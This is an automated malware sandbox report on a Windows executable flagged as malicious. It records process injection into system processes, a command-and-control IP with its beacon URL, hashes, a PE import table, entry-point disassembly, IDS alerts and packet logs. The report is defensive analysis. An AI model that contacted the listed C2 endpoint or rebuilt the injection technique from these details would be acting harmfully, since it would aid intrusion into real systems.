http://47.76.199.218/index.php/inface/Indexnew?d=1&member_id=555prc4xnupd&stamptime=1735806635&data=	BackgroundTransferHost.exe, 00000009.00000003.3183748550.0000000002AB7000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.v	explorer.exe, 00000002.00000002.3292960857.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.2035928494.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	false		high
http://47.76.199.218om	control.exe, 00000003.00000002.3293163076.0000000002E79000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000006.00000002.3293216939.0000000000B8A000.00000004.00000020.00020000.00000000.sdmp, resmon.exe, 00000008.00000002.3293228985.0000000002859000.00000004.00000020.00020000.00000000.sdmp, BackgroundTransferHost.exe, 00000009.00000003.3183775857.0000000002A92000.00000004.00000020.00020000.00000000.sdmp, BackgroundTransferHost.exe, 00000009.00000002.3293745116.0000000002A93000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://wns.windows.com/)s	explorer.exe, 00000002.00000000.2044913659.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3094503764.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.3299498733.00000000099C0000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
47.76.199.218	api.5566331.com	United States		9500	VODAFONE-TRANSIT-ASVodafoneNZLtdNZ	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583249
Start date and time:	2025-01-02 09:27:34 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	1731043030539.exe
Detection:	MAL
Classification:	mal100.evad.winEXE@13/1@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 93% Number of executed functions: 156 Number of non-executed functions: 277
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 20.12.23.50, 13.107.253.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:28:25	API Interceptor	785x Sleep call for process: explorer.exe modified
03:28:47	API Interceptor	5x Sleep call for process: control.exe modified
03:29:16	API Interceptor	5x Sleep call for process: fontview.exe modified
03:29:44	API Interceptor	4x Sleep call for process: resmon.exe modified
03:30:11	API Interceptor	5x Sleep call for process: BackgroundTransferHost.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
VODAFONE-TRANSIT-ASVodafoneNZLtdNZ	armv7l.elf	Get hash	malicious	Unknown	Browse	47.78.236.90
	botx.mips.elf	Get hash	malicious	Mirai	Browse	49.226.28.57
	zhuzhu.exe	Get hash	malicious	GhostRat, XRed	Browse	47.79.48.211
	QQyisSetups64.exe	Get hash	malicious	GhostRat	Browse	47.79.48.211
	armv7l.elf	Get hash	malicious	Mirai	Browse	47.78.183.235
	armv5l.elf	Get hash	malicious	Mirai	Browse	49.227.11.95
	nklsh4.elf	Get hash	malicious	Unknown	Browse	121.74.237.200
	sh4.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	121.75.40.91
	arm.elf	Get hash	malicious	Mirai	Browse	47.78.236.95
	arm5.elf	Get hash	malicious	Mirai	Browse	27.252.170.217

Process:	C:\Users\user\Desktop\1731043030539.exe
File Type:	data
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.170207572684699
Encrypted:	false
SSDEEP:	6:vHP5EAgrP5X1PP5r0KxP5to1PP5YEyP5SyP5oP5e1PkP5QVbP1:vhpgdX1JA221JYEIBKxAr1
MD5:	23B9E0EA3B42B889CA42AAD0BAA82CB7
SHA1:	E773EFFEA437FACDDF642B43ED2A3BC6E926AB36
SHA-256:	333F7CA1A6C2C68F19335853CDAE415D635FE9B12F055CC6AAB724FCD43A0697
SHA-512:	52098958338AF77F8D8BFBC04EE092ABDA48B8440943069812CFEE302329AD7B350FC48630054738DD5DFF6FBE75C4A1DF6EE19E047D4A25480414F1C2D27BCC
Malicious:	false
Reputation:	low
Preview:	...]......................]...........e;.........]...........]................]...........]................]...........]................]...........]................]............!............].........y.6..........]..............y.6.U......

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.404156100365436
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	1731043030539.exe
File size:	1'088'000 bytes
MD5:	0ffa0039c3e96e4b95293b09db72cd85
SHA1:	1b5cc84e46e0c6c40ce64c5d6a18885084da3256
SHA256:	f747fb3f504a9c6b9e83162331951407fdb6d1e9afdfb7955821f2aca03f172b
SHA512:	7b8a459402265e99f11d806133f9f07abb9ec08fbac92c4f5715a90263617e63989be19c1bbafdced6e8558b48939ed0d452ebe95a7010172556544403f26528
SSDEEP:	12288:6s3DLfX68DXY8gjMUmokDa5cUUUOEl5w+Rg8YVeSBLQQBx2ebfvfQsnc8:JTLfHYh4Um65p5VkzUSBLDx2ezvfQsn
TLSH:	9A350107368740A7C4BA867889A7BF01B3BA796103359BEF135493D91F637E05D39B22
File Content Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....0Xf.........."..........\|.................@..........................................`........................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x140001000
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x665830A3 [Thu May 30 07:54:11 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	3e479d5500318dface23fd2fb5d92cda

Entrypoint Preview

Instruction
push esi
push edi
dec eax
sub esp, 00000228h
dec eax
lea edx, dword ptr [0010AFF0h]
xor ecx, ecx
call 00007FAB70F7D1B9h
mov esi, eax
xor ecx, ecx
call dword ptr [0010875Fh]
dec eax
lea edi, dword ptr [esp+20h]
dec eax
mov ecx, eax
dec eax
mov edx, edi
inc ecx
mov eax, 00000104h
call dword ptr [00108738h]
dec eax
mov ecx, edi
call 00007FAB70F7E6C5h
mov ecx, esi
call dword ptr [00108708h]
int3
int3
int3
int3
inc ecx
push esi
push esi
push edi
push ebp
push ebx
dec eax
sub esp, 00000240h
dec eax
mov edi, edx
dec eax
mov esi, ecx
dec eax
mov edx, dword ptr [ecx+08h]
dec eax
lea ecx, dword ptr [edi+2Ch]
call dword ptr [001087E3h]
inc eax
mov ch, 01h
test eax, eax
jne 00007FAB70F7D090h
inc esp
mov eax, dword ptr [edi+08h]
mov ecx, 001FFFFFh
xor edx, edx
call dword ptr [0010872Fh]
dec eax
test eax, eax
je 00007FAB70F7D076h
dec eax
mov ebx, eax
dec esp
lea esi, dword ptr [esp+2Ch]
dec eax
mov ecx, eax
dec esp
mov edx, esi
call dword ptr [00108706h]
mov eax, dword ptr [esi+10h]
inc eax
mov ch, 01h
inc ecx
cmp eax, dword ptr [esi]
jne 00007FAB70F7D04Eh
dec esp
lea ecx, dword ptr [esp+28h]
inc ecx
mov dword ptr [ecx], 00000104h
dec esp
lea eax, dword ptr [esp+30h]
dec eax
mov ecx, ebx
xor edx, edx
call dword ptr [00108707h]

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x10943a	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x10b000	0xe4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x10d000	0x38	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1096f0	0x210	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1866	0x1a00	ea8bab875c4dc55c25aaa846d617d43b	False	0.5360576923076923	data	5.856150049532572	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x3000	0x106ed4	0x107000	daf86f80b57d60926446b95655c37d94	False	0.8123598280061787	data	7.418582481203113	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x10a000	0x600	0x600	8023741cfcb04b07641f0734bbbe4c84	False	0.3736979166666667	data	3.7582715948787286	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x10b000	0xe4	0x200	32f7610296c75435df8f9d20850fccec	False	0.30078125	data	2.085268531812776	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.sign	0x10c000	0x40	0x200	b609c02f8ec77410395572fb357c1e03	False	0.08203125	data	0.3046166846600516	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10d000	0x38	0x200	31793cffeb14835e25569b41ea018439	False	0.126953125	GLS_BINARY_LSB_FIRST	0.6437088733849333	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
cryptdll.dll	MD5Final, MD5Init, MD5Update
KERNEL32.dll	CloseHandle, CreateFileMappingW, CreateFileW, CreateMutexW, CreateProcessW, CreateRemoteThread, CreateToolhelp32Snapshot, DeleteProcThreadAttributeList, ExitProcess, GetComputerNameW, GetCurrentProcess, GetCurrentProcessId, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetThreadContext, GlobalAlloc, GlobalFree, InitializeProcThreadAttributeList, IsWow64Process, MapViewOfFile, OpenProcess, Process32FirstW, Process32NextW, QueryFullProcessImageNameW, ResumeThread, SetThreadContext, Sleep, UpdateProcThreadAttribute, VirtualAllocEx, VirtualFreeEx, VirtualProtectEx, WaitForSingleObject, Wow64GetThreadContext, Wow64SetThreadContext, WriteFile, WriteProcessMemory, lstrcatW, lstrcmpA, lstrcmpW, lstrcmpiW, lstrcpyW, lstrlenW
USER32.dll	wsprintfW
ADVAPI32.dll	AdjustTokenPrivileges, CloseServiceHandle, GetTokenInformation, LookupAccountSidW, LookupPrivilegeValueW, OpenProcessToken, OpenSCManagerW, OpenServiceW, QueryServiceStatusEx
SHLWAPI.dll	PathFindFileNameW
ole32.dll	StringFromGUID2
USERENV.dll	ExpandEnvironmentStringsForUserW

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-02T09:28:27.682748+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49705	47.76.199.218	80	TCP
2025-01-02T09:28:33.248489+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49706	47.76.199.218	80	TCP
2025-01-02T09:28:38.748633+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49707	47.76.199.218	80	TCP
2025-01-02T09:28:44.165363+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49712	47.76.199.218	80	TCP
2025-01-02T09:28:56.455947+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49780	47.76.199.218	80	TCP
2025-01-02T09:29:01.859281+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49815	47.76.199.218	80	TCP
2025-01-02T09:29:07.263497+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49850	47.76.199.218	80	TCP
2025-01-02T09:29:12.685796+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49883	47.76.199.218	80	TCP
2025-01-02T09:29:24.663598+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49956	47.76.199.218	80	TCP
2025-01-02T09:29:30.062263+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49987	47.76.199.218	80	TCP
2025-01-02T09:29:35.492858+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49988	47.76.199.218	80	TCP
2025-01-02T09:29:40.889568+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49989	47.76.199.218	80	TCP
2025-01-02T09:29:51.235726+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49992	47.76.199.218	80	TCP
2025-01-02T09:29:56.827496+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49993	47.76.199.218	80	TCP
2025-01-02T09:30:02.466649+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49994	47.76.199.218	80	TCP
2025-01-02T09:30:07.874318+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49995	47.76.199.218	80	TCP
2025-01-02T09:30:20.103478+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49997	47.76.199.218	80	TCP
2025-01-02T09:30:25.498305+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49998	47.76.199.218	80	TCP
2025-01-02T09:30:30.908500+0100	2022112	ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015	1	192.168.2.5	49999	47.76.199.218	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 2, 2025 09:28:27.668889046 CET	49705	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:27.674048901 CET	80	49705	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:27.674197912 CET	49705	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:27.677767038 CET	49705	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:27.682600021 CET	80	49705	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:27.682748079 CET	49705	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:27.687689066 CET	80	49705	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:28.208077908 CET	49705	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:28.256999016 CET	80	49705	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:28.258307934 CET	49705	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:33.238224030 CET	49706	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:33.243191957 CET	80	49706	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:33.243277073 CET	49706	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:33.243375063 CET	49706	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:33.248431921 CET	80	49706	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:33.248488903 CET	49706	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:33.253350973 CET	80	49706	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:33.711718082 CET	49706	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:33.763279915 CET	80	49706	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:33.837513924 CET	80	49706	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:33.837609053 CET	49706	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:38.738611937 CET	49707	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:38.743540049 CET	80	49707	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:38.743664026 CET	49707	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:38.743731976 CET	49707	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:38.748577118 CET	80	49707	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:38.748632908 CET	49707	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:38.753388882 CET	80	49707	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:39.118031979 CET	49707	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:39.163342953 CET	80	49707	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:39.322598934 CET	80	49707	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:39.322685957 CET	49707	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:44.147813082 CET	49712	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:44.152880907 CET	80	49712	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:44.152993917 CET	49712	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:44.160310984 CET	49712	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:44.165149927 CET	80	49712	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:44.165363073 CET	49712	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:44.170165062 CET	80	49712	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:44.524333000 CET	49712	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:44.575218916 CET	80	49712	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:44.739018917 CET	80	49712	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:44.739145994 CET	49712	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:51.083991051 CET	49745	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:51.088819981 CET	80	49745	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:51.092416048 CET	49745	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:51.092489004 CET	49745	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:51.097261906 CET	80	49745	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:51.100594997 CET	49745	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:51.105483055 CET	80	49745	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:51.461958885 CET	49745	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:51.507374048 CET	80	49745	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:51.677004099 CET	80	49745	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:51.677134037 CET	49745	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:56.445458889 CET	49780	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:56.450391054 CET	80	49780	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:56.450546026 CET	49780	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:56.450787067 CET	49780	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:56.455874920 CET	80	49780	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:56.455946922 CET	49780	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:56.461308956 CET	80	49780	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:56.821347952 CET	49780	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:28:56.867238045 CET	80	49780	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:57.034246922 CET	80	49780	47.76.199.218	192.168.2.5
Jan 2, 2025 09:28:57.034332991 CET	49780	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:01.848031998 CET	49815	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:01.852993965 CET	80	49815	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:01.854320049 CET	49815	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:01.854408979 CET	49815	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:01.859204054 CET	80	49815	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:01.859281063 CET	49815	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:01.864212036 CET	80	49815	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:02.227659941 CET	49815	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:02.275218010 CET	80	49815	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:02.441021919 CET	80	49815	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:02.441097021 CET	49815	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:07.253690004 CET	49850	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:07.258513927 CET	80	49850	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:07.258591890 CET	49850	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:07.258675098 CET	49850	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:07.263433933 CET	80	49850	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:07.263497114 CET	49850	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:07.268352032 CET	80	49850	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:07.635191917 CET	49850	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:07.687275887 CET	80	49850	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:07.847598076 CET	80	49850	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:07.850141048 CET	49850	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:12.675941944 CET	49883	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:12.680811882 CET	80	49883	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:12.680933952 CET	49883	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:12.680989981 CET	49883	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:12.685743093 CET	80	49883	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:12.685796022 CET	49883	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:12.690568924 CET	80	49883	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:13.056684971 CET	49883	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:13.103224993 CET	80	49883	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:13.265089989 CET	80	49883	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:13.265217066 CET	49883	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:19.453357935 CET	49919	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:19.458220959 CET	80	49919	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:19.458345890 CET	49919	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:19.458445072 CET	49919	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:19.463227987 CET	80	49919	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:19.463282108 CET	49919	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:19.468043089 CET	80	49919	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:19.821326971 CET	49919	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:19.867286921 CET	80	49919	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:20.062026978 CET	80	49919	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:20.062190056 CET	49919	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:24.653476000 CET	49956	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:24.658401966 CET	80	49956	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:24.658533096 CET	49956	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:24.658730030 CET	49956	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:24.663511992 CET	80	49956	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:24.663598061 CET	49956	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:24.668384075 CET	80	49956	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:25.024789095 CET	49956	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:25.075211048 CET	80	49956	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:25.232357979 CET	80	49956	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:25.232458115 CET	49956	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:30.052290916 CET	49987	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:30.057164907 CET	80	49987	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:30.057281971 CET	49987	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:30.057358980 CET	49987	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:30.062170029 CET	80	49987	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:30.062263012 CET	49987	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:30.067018986 CET	80	49987	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:30.446345091 CET	49987	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:30.495177984 CET	80	49987	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:30.643738031 CET	80	49987	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:30.643922091 CET	49987	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:35.481987953 CET	49988	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:35.487520933 CET	80	49988	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:35.487683058 CET	49988	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:35.487802029 CET	49988	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:35.492656946 CET	80	49988	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:35.492857933 CET	49988	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:35.497715950 CET	80	49988	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:35.852691889 CET	49988	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:35.899207115 CET	80	49988	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:36.124754906 CET	80	49988	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:36.124864101 CET	49988	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:40.879091978 CET	49989	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:40.883919001 CET	80	49989	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:40.884044886 CET	49989	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:40.884139061 CET	49989	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:40.889457941 CET	80	49989	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:40.889568090 CET	49989	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:40.894391060 CET	80	49989	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:41.259040117 CET	49989	80	192.168.2.5	47.76.199.218
Jan 2, 2025 09:29:41.307221889 CET	80	49989	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:41.462749958 CET	80	49989	47.76.199.218	192.168.2.5
Jan 2, 2025 09:29:41.462810040 CET	49989	80	192.168.2.5	47.76.199.218
